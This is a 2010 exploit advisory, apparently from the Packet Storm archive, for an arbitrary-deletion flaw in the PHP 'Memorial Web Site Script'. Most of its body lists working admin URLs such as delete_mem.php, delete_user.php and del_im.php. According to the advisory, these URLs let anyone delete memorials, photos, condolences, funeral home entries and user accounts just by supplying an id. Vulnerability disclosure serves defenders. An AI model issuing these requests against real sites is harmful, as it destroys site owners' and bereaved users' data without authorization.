exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Memorial Web Site Script Arbitrary Deletion

Memorial Web Site Script Arbitrary Deletion
Posted Apr 24, 2010
Authored by Chip D3 Bi0s

Memorial Web Site Script suffers from arbitrary deletion vulnerabilities.

tags | exploit, web, arbitrary, vulnerability
SHA-256 | 34df70ef7f3e332dedf0d10c15adb1e459312dee1c3fdf01c2cc20cad236c322

Memorial Web Site Script Arbitrary Deletion

Change Mirror Download
-----------------------------------------------------------------------------------------
Memorial Web Site Script Multiple Arbitrary Delete Vuln
-----------------------------------------------------------------------------------------

Author : Chip D3 Bi0s
Email : chipdebios[alt+64]gmail.com
Where : From Remote
Team : LatinHackTeam


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Author : Easy Scripts
Price : $49
Vendor : http://www.easy-scripts.net

description Bug:
~~~~~~~~~~~~~~~
After seeing the bug v3n0m:
http://www.exploit-db.com/exploits/12351

I kept seeing some things,
Discovery that could clear things published registered user,
even delete registered users:)
to do so, we must first get the id of registered users
I'd have this form in some of its publications

http://127.0.0.1/[path]/show_memorial.php?id=100


then only get the id can delete all these things
Memorials, Pictures, Multimple Pictures, Condoleances,
Funeral homes, Resell & Delet Users

All this is explained below:


-------------------
Delet Memorials
http://127.0.0.1/[path]/admin/delete_mem.php?id=100

------------------
Delet Pictures
http://127.0.0.1/[path]/admin/delete_pic.php?id=100



in case of multiple images
View Source on the pole is thus

var preloadedimages=new Array();
var timeoutId;

photos[0]="pictures/1158372383_0_sub.JPG";
names[0]="";
photos[1]="pictures/1158372858_0_sub.JPG";
names[1]="Mon&Dad";
photos[2]="pictures/1158372975_0_sub.JPG";
names[2]="Cementry";
photos[3]="pictures/1158373106_0_sub.JPG";
names[3]="Dad&Tommy";
photos[4]="pictures/1158373106_1_sub.JPG";
names[4]="Dad&Steve";
photos[5]="pictures/1158373335_0_sub.JPG";
names[5]="";
photos[6]="pictures/1158375471_0_sub.JPG";
names[6]="Dad7Minoo&Homa";

Delet Multimple Pictures

http://127.0.0.1/[path]/admin/del_im.php?id=100&name=1158375471_0_sub.JPG
-------------------

Delet Condoleances
http://127.0.0.1/[path]/dmin/delete_con.php?id=100

-------------
Delet Funeral homes
http://127.0.0.1/[path]/admin/delete_fh.php?id=100


--------
Delet Resell
http://127.0.0.1/[path]/admin/delete_resell.php?id=100

---------
Delet Users
http://127.0.0.1/[path]/admin/delete_user.php?id=100



+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close